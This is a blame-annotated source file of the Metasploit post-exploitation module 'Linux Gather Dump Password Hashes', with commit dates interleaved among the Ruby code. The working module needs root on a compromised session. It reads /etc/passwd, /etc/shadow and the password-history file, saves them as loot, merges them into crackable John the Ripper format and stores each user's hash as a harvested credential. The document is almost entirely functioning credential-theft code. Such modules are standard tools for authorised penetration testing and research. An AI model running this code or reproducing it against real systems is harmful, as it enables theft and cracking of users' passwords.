Files
metasploit-gs/modules/post/linux/gather/hashdump.rb
T

96 lines
2.9 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2019-03-23 14:02:34 -04:00
require 'metasploit/framework/hashes/identify'
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Post
2013-09-05 13:41:25 -05:00
include Msf::Post::File
include Msf::Post::Linux::Priv
2019-08-04 01:12:06 +00:00
def initialize(info = {})
2013-08-30 16:28:54 -05:00
super( update_info( info,
2019-08-04 01:12:06 +00:00
'Name' => 'Linux Gather Dump Password Hashes for Linux Systems',
'Description' => %q{ Post Module to dump the password hashes for all users on a Linux System},
'License' => MSF_LICENSE,
'Author' => ['Carlos Perez <carlos_perez[at]darkoperator.com>'],
'Platform' => ['linux'],
'SessionTypes' => ['shell', 'meterpreter']
))
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
# Run Method for when run command is issued
def run
2019-08-04 01:12:06 +00:00
unless is_root?
fail_with Failure::NoAccess, 'You must run this module as root!'
end
passwd_file = read_file('/etc/passwd')
unless passwd_file.nil?
p = store_loot("linux.passwd", "text/plain", session, passwd_file, "passwd.tx", "Linux Passwd File")
vprint_good("passwd saved in: #{p}")
end
shadow_file = read_file('/etc/shadow')
unless shadow_file.nil?
p = store_loot("linux.shadow", "text/plain", session, shadow_file, "shadow.tx", "Linux Password Shadow File")
vprint_good("Shadow saved in: #{p}")
end
opasswd_file = read_file('/etc/security/opasswd')
unless opasswd_file.nil?
p = store_loot("linux.passwd.history", "text/plain", session, opasswd_file, "opasswd.tx", "Linux Passwd History File")
vprint_good("opasswd saved in: #{p}")
end
# Unshadow the files
john_file = unshadow(passwd_file.to_s, shadow_file.to_s)
return if john_file == ''
john_file.each_line do |l|
hash_parts = l.split(':')
jtr_format = identify_hash hash_parts[1]
if jtr_format.empty? #overide the default
jtr_format = 'des,bsdi,crypt'
2013-08-30 16:28:54 -05:00
end
2019-08-04 01:12:06 +00:00
credential_data = {
jtr_format: jtr_format,
origin_type: :session,
post_reference_name: self.refname,
private_type: :nonreplayable_hash,
private_data: hash_parts[1],
session_id: session_db_id,
username: hash_parts[0],
workspace_id: myworkspace_id
}
create_credential(credential_data)
print_good(l.chomp)
2013-08-30 16:28:54 -05:00
end
2019-08-04 01:12:06 +00:00
# Save passwd file
upasswd = store_loot("linux.hashes", "text/plain", session, john_file, "unshadowed_passwd.pwd", "Linux Unshadowed Password File")
print_good("Unshadowed Password File: #{upasswd}")
2013-08-30 16:28:54 -05:00
end
2019-08-04 01:12:06 +00:00
def unshadow(pf, sf)
unshadowed = ''
2013-08-30 16:28:54 -05:00
sf.each_line do |sl|
pass = sl.scan(/^\w*:([^:]*)/).join
2019-08-04 01:12:06 +00:00
next if pass == '*'
next if pass == '!'
user = sl.scan(/(^\w*):/).join
pf.each_line do |pl|
next unless pl.match(/^#{user}:/)
unshadowed << pl.gsub(/:x:/,":#{pass}:")
2013-08-30 16:28:54 -05:00
end
end
2014-07-09 08:48:20 -05:00
unshadowed
2013-08-30 16:28:54 -05:00
end
end